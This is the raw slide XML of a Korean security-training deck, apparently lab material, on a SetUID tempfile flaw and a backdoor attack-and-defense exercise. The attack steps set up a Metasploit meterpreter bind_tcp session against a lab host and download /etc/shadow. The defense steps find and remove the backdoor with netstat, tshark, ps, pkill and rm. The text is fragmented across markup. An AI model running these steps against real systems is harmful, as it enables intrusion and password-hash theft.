              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tempfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>삭제 후 다시 파일을 추가하는 취약점으로 권한 상승에 이용될 수 있음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ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>취약한 부분 수정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remove </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>제거 및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fopen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>옵션 변경</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(“a” → “w”)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491166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4) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>createTempFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>재빌드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gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> –o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>createTempFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>createTempFile.c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5) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>부여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chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>u+s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>createTempFile</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 155">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51C86DE2-5CFF-4922-B74D-3E79D49FC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1100666"/>
            <a:ext cx="5135880" cy="5410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157">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77AE325C-E7D5-42AF-837C-9CF57E2E09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2" t="895" r="753" b="540"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="479425" y="2190750"/>
            <a:ext cx="4705350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59">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C1EB702-DA42-4AD4-A5CE-03B8D959BB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5" t="-19" r="821" b="460"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6310313" y="466726"/>
            <a:ext cx="4891087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161">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A719016-8296-4BCE-A732-C7DB894592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14" t="13375" r="936" b="78042"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6310313" y="3671888"/>
            <a:ext cx="4891087" cy="2762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163">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7AC04FE-A749-43E7-A9DD-F9FF82E99E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65" t="13945" r="1303" b="65179"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6310313" y="4491036"/>
            <a:ext cx="4826191" cy="66675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4F8C23-D2DC-409F-BC4C-A9AA10E30E4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="5378388"/>
            <a:ext cx="5616792" cy="111061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check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력 및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>키코드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 획득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check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837202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/Training/Unit/Sys/13</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 13. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>백도어</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 공격 및 방어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msfconsole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도구를 사용하여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백도어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서버를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구동하시오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pic>
        <p:nvPicPr>
          <p:cNvPr id="34" name="Picture 10" descr="question icon 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B505F5E5-1AFC-4BE0-A2FB-19F018AC4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toor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Backdoor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탐지할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Backdoor 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대응할 수 있다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(CentOS 6)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442823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ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>터미널 실행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ifconfig </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>명령으로 공격 서버의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>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ifconfig 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Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행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4) Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>콘솔에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>use exploit/multi/handler </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> &gt; use exploit/multi/handler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5) Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>콘솔에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>set PAYLOAD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>bind_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> exploit(handler) &gt; set PAYLOAD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>bind_tcp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6) Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>콘솔에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>show options </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> exploit(handler) &gt; show options</a:t>
            </a:r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pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 167">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E295136F-BC83-41C3-8CA1-CCEBAC773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" y="1062566"/>
            <a:ext cx="4922647" cy="297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169">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA368846-64C5-4769-92E1-E1A20DD21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61" y="4560146"/>
            <a:ext cx="1474084" cy="73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71">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99680F7B-188C-480E-B4BA-66C2B9E08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539" y="4352903"/>
            <a:ext cx="3512349" cy="1868328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2" name="Picture 173">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBD3A009-4181-4981-8B27-BC0B311D94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" t="87424" r="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6324600" y="944880"/>
            <a:ext cx="4992624" cy="35136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3" name="Picture 175">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCE44FFD-315F-4697-AF6C-1E6DF9EB9E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" t="88153" r="-1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6321334" y="1993011"/>
            <a:ext cx="4992624" cy="35136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4" name="Picture 177">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{974ED12D-E9DE-45FC-AE82-FACB25C0D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382" y="3041142"/>
            <a:ext cx="4989576" cy="2984373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32704005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1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7) RHOST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에 백도어가 실행 중인 서버 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>주소 입력 및 공격 실행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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> exploit(handler) &gt; set RHOST 10.10.1.14 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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> exploit(handler) &gt; exploit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8) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>명령어 실행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meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> &gt; ls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9)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/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>다운로드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meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> &gt; download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/shadow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311334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10) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>세션 및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>종료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meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> &gt; exit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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> exploit(handler) &gt; exit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11) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>다운로드받은</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일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cat shadow</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 179">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58C3BCA3-9BB8-4337-B5CF-B403A753F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9926" r="168"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="485141" y="1173480"/>
            <a:ext cx="4894580" cy="1479253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6" name="Picture 181">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{891A50A9-8CB4-4BBE-980C-FBD922DBB5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57835" r="-34"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="485141" y="3261360"/>
            <a:ext cx="4981586" cy="125306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7" name="Picture 183">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1F17DDB-A907-4B63-9349-AC559CF79C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372" r="-587"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="514235" y="5224401"/>
            <a:ext cx="4981586" cy="460119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8" name="Picture 185">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6063D546-AB04-4D65-9C36-C2817EA9E7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75071" r="111"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6314441" y="1090633"/>
            <a:ext cx="4947920" cy="73547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187">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34395978-B9BB-4247-AB05-15CF4EFB3C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6256"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6291835" y="2324100"/>
            <a:ext cx="4959223" cy="99563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51361A-A816-4D54-9650-AAEAA2A01279}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="3596640"/>
            <a:ext cx="5616792" cy="289235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en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>acheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력 및 다운로드 받은 파일 이름 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aehcek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/root/shadow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969196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보안 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72AF5CF2-5352-4A46-B0EB-8A66B562E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hlinkClick r:id="rId3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/Training/Unit/Sys/13</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 13. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>백도어</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 공격 및 방어 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>대응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Linux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시스템에 해커가 침입하여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내부에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백도어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프로그램을 심어 놨다는 정보가 입수되었다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외부 공격자 서버와 접속 중인 것으로 보이는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백도어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프로그램을 찾아 삭제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1)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열린 포트 목록 확인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netstat -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tnap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2)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실행 중인 프로세스 확인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ps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ef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3)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실행 중인 프로세스 중지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pkill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4)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 삭제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rm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Backdoor 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탐지할 수 있다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Backdoor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(CentOS 6)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943698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netstat -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tnap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> | more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>명령으로 열린 포트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netstat -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tnap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> | more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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패킷 캡처 및 분석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tshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> –c 200 –w packet.txt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tshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> –r packet.txt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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>사용자 서버와 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>192.168.1.169 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버 간에 많은 통신이 수행되고 있음을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ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>해당 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>와 통신하는 포트 및 프로세스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netstat -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tnap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> | more</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 189">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{728B4C54-43A6-446E-9DF2-58C0AE154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879686"/>
            <a:ext cx="4877816" cy="2735199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6" name="Picture 191">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10B247FD-E1F6-4EF3-9F6D-FC3F3EC6D8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93" r="2233"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="491072" y="4282440"/>
            <a:ext cx="4877816" cy="609684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7" name="Picture 193">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3EBBEC8-DFA0-4959-BBFF-C5F1A8B587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214" r="350"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="491072" y="5158135"/>
            <a:ext cx="4989196" cy="1064852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8" name="Picture 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9969BFB-5647-4C23-96C6-0F1477534F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7140" r="480"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6340729" y="486293"/>
            <a:ext cx="4982591" cy="174798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0" name="Picture 197">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B282583C-EB70-428E-A36A-5E719528FD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093"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6340729" y="2995262"/>
            <a:ext cx="4877816" cy="17479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E0A445C-03BC-4C6F-9C9B-0EB26966B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761004"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6340729" y="4803146"/>
          <a:ext cx="4932807" cy="1467993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2996282951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453205"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="99415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파일을 찾는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명령도 활용 가능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find / -name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linux.elf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091311"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="80897" name="_x1658364984">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1621EE3-D92B-43A5-A1BC-CB3D95DE5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352" y="5648745"/>
            <a:ext cx="3733800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5050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4) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>백도어</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 의심 프로세스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ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>ef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> | grep </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/elf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5) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>해당 프로세스 강제 종료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pkill</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>linux.elf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6) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>백도어</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 의심 프로그램 파일 삭제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rm /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>linux.elf</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 199">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBBC3C99-54C1-4543-AEE4-CC09504CF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0" y="864446"/>
            <a:ext cx="5019040" cy="54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01">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B1EF64E-0818-4E2B-B2FB-91D8CF887F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24" r="-82" b="82276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="561340" y="1988820"/>
            <a:ext cx="3096260" cy="17953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7" name="Picture 203">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D69C25BA-3706-4FD8-8E42-8515EC5CD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40" y="2838026"/>
            <a:ext cx="5019040" cy="43408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851B8-522B-416D-AB73-C1FA38C7270C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
